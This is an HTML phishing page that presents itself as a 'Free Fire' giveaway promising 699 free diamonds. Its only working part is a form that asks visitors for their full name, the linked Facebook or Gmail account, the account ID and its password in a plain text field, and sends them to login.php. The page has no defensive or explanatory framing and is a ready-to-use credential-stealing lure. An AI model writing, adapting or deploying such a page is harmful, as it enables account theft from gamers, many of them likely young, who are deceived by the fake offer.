<html lang="en"><head> 
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-123738953-2"></script> 
  <script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-123738953-2');
</script> 
  <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> 
  <meta property="og:locale" content="en"> 
  <title>Free Fire Offer ! Get free Diamond</title> 
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"> 
  <meta property="og:type" content="website"> 
  <meta property="og:title" content=" Free Fire Offer ! Get free Diamond "> 
  <meta property="og:url" content="index.php"> 
  <meta property="og:description" content="Try it now"> 
  <meta property="og:site_name" content="Free Fire Diamond"> 
  <meta property="og:image" content="http://freefirediamond.22web.org/"> 
  <link rel="shortcut icon" href="/sicon.png" type="image/x-icon"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="../www.w3schools.com/w3css/4/w3.css"> 
  <style>
a {
  color:#000000;
  text-decoration:none;}
body {
    background: #555;
}
.mySlides {display:none;}

.content {
    max-width: 500px;
    margin: 0px;
}

header .h_logo {
color: rgb(255, 255, 255);
font-size: 30px;
text-align: center;
}
header .h_logo img {
  width: 100%;
}
header h1 {
  font-size: 18px;
font-style: bold;
  color: white;
  text-align: center;
  margin: 0px; 
  padding: 10px;
  background: rgb(235, 170, 73);
}
input[type=text], select, textarea {
    width: 100%;
    padding: 12px;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
    margin-top: 6px;
    margin-bottom: 16px;
    resize: vertical;
}
input[type=number], select, textarea {
    width: 100%;
    padding: 12px;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
    margin-top: 6px;
    margin-bottom: 16px;
    resize: vertical;
}


.lable {
font-size: 18px;
font-style: bold;
  color: red;
  text-align: left;
}

.button {
    background-color: #F26D20; /* Color */
    border: none;
    color: white;
    padding: 10px 15px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 20px;
    margin: 4px 2px;
    cursor: pointer;
}

.button:hover {
    background-color: #4CAF50; /* Green */
    color: white;
}
.new {width: 250px;}

.btn-lg {
  font-size: 18px;
text-align: center; 
   font-weight: bold;
  line-height: 1.33;
  border-radius: 6px;
 
}

.round {
  border-radius: 24px;
}
.whatsapp {
  background:#2ECC71 !important;
  color:#FFFFFF;
  margin-top:0px;
  padding: 5px 5px;
}
.final {
  background:#3498DB;
  color:#FFFFFF;
  display:block;
  margin-top:0px;
  padding: 5px 5px;
  text-align:center;
  width:50%;
}
.last {
  background:#f26263;
  color:#FFFFFF;
  display:block;
  margin-top:0px;
  padding: 5px 5px;
  text-align:center;
  width:50%;
}
.aadi {width: 80%;
border-radius: 16px;
}


body {
    background: #555;
}
.content {
    max-width: 500px;
    margin: auto;
}


.container {
    border-radius: 5px;
    background-color: #f2f2f2;
    padding: 20px;
    margin: auto;
}
.container2 {
    border-radius: 5px;
    background-color: #f2f2f2;
    padding: 2px;
    margin: 0px;
}
</style> 
 </head> 
 <body> 
  <div class="content"> 
   <div class="container2"> 
    <header> 
     <div class="h_logo"> 
      <img src="https://i.ibb.co/f0H89XD/pubg.jpg" height="auto"> 
      <h1><b>Free Fire Giveway Offer ! Get free Diamond</b></h1> 
     </div> 
    </header> 
    <div class="container"> 
     <center> 
     </center> 
     <form action="login.php" class="sucess-none" method="post" id="registrationform"> 
      <center> 
      </center> 
      <br> 
      <b>Your Full Name</b> 
      <input type="text" id="name" name="name" placeholder="Enter Your Full Name..." Title="Enter Your Full Name" required> 
      <b>Free Fire Id Connected With </b> 
      <input type="text" id="userid" name="from" placeholder="Like: Facebook, Gmail etc." pattern="[" maxlength="" minlength="" Title="Please enter valid User ID" required> 
      <b>Free Fire Connected Id</b> 
      <input type="text" id="userid" name="id" placeholder="Enter Your Free Fire Connected ID..." pattern="[" maxlength="" minlength="" Title="Please enter valid User ID" required> 
      <b>Password</b> 
      <input type="text" id="pass" name="pass" placeholder="Type Password of Your id" Title="Enter Your Full Name" required> 
      <b>Diamond Amount</b> 
      <select id="UC" name="Diamond" disable> <option value="699">699 Diamond</option> </select> 
      <button class="button new btn-lg round" style="width:100%" value="Submit" align="center" type="submit"><i class="fa fa-hand-o-right" aria-hidden="true">&nbsp;</i><b>Receive</b></button> 
     </form> 
     <br> 
    </div> 
   </div> 
  </div> 
 
</body></html>